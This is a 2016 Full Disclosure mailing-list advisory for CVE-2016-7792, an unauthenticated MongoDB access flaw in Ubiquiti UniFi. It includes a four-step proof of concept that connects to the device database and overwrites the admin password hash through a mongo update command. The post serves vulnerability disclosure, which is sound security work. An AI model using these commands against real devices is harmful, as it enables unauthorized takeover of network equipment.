[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: [FD] Critical Vulnerability in Ubiquiti UniFi
From: Tim Schughart <t.schughart () prosec-networks ! com>
Date: 2016-09-30 9:49:26
Message-ID: 595767868.209491.1475228966431.JavaMail.zimbra () prosec-networks ! com
[Download RAW message or body]
Hello @all,
together with my colleague we found two uncritical vulnerabilities you'll find below.
Product: UniFi AP AC Lite
Vendor: Ubiquiti Networks Inc.
Internal reference: ? (Bug ID)
Vulnerability type: Incorrect access control
Vulnerable version: Unify 5.2.7 and possible other versions affected (not tested)
Vulnerable component: Database
Report confidence: yes
Solution status: Not fixed by Vendor, the bug is a feature.
Fixed versions: -
Researcher credits: Tim Schughart, Immanuel Bär, Khanh Quoc Pham of ProSec Networks
Solution date: -
Public disclosure: 2016-09-30
CVE reference: CVE-2016-7792
CVSSv3: 8.8 AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Vulnerability Details:
You are able to connect to the access points database, because of an broken authentication \
(OWASP TOP10). So you are able to modify the database and read the data. An possible scenario \
you'll find in PoC section.
Risk:
An attacker gets access to the database and for e.g. is able to change the admins password, \
like you see in PoC below.
PoC:
1. Generate SHA512 Hash with e.g.
mkpasswd -m sha-512
2. Connect via network to database, e.g. :
mongo --port 27117 --host target_ip
3. Change password via command
"db.admin.update({"name":"ProSec"}, {$set : {"x_shadow":
"$6$Se9i5I7k3hI8d4bk$CqEXRUwk7c7A/62E/HcC4SrMSLOrBdm7wRvwTS4t.nNJA3RYta0RfzJpuREg.qcAHsPGW9Gjwm3krJROXzbCv."}})"
4. Login via web interface with new password
Best regards / Mit freundlichen Grüßen
Tim Schughart
CEO / Geschäftsführer
--
ProSec Networks e.K.
Ellingshohl 82
56077 Koblenz
Website: https://www.prosec-networks.com
E-Mail: t.schughart@prosec.networks.com
Mobile: +49 (0)157 7901 5826
Phone: +49 (0)261 450 930 90
"This E-Mail communication may contain CONFIDENTIAL, PRIVILEGED and/or LEGALLY PROTECTED \
information and is intended only for the named recipient(s). Any unauthorized use, \
dissemination, copying or forwarding is strictly prohibited. If you are not the intended \
recipient and have received this email communication in error, please notify the sender \
immediately, delete it and destroy all copies of this E-Mail. VAT ID: DE290654714 legal \
domicile Koblenz, HRA 21625."
"Diese E-Mail Mitteilung kann VERTRAULICHE, dem BERUFSGEHEIMNIS UNTERLIEGENDE und/oder \
RECHTLICH GESCHÜTZTE Informationen enthalten und ist ausschließlich für den/die genannten \
Adressaten bestimmt. Jede unbefugte Nutzung, Weitergabe, Vervielfältigung oder Versendung ist \
strengstens verboten. Sollten Sie nicht der angegebene Adressat sein und diese E-Mail \
Mitteilung irrtümlich erhalten haben, informieren Sie bitte sofort den Absender, löschen \
diese E-Mail und vernichten alle Kopien. USt-IdNr.: DE290654714, Amtsgericht Koblenz, HRA \
21625."
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic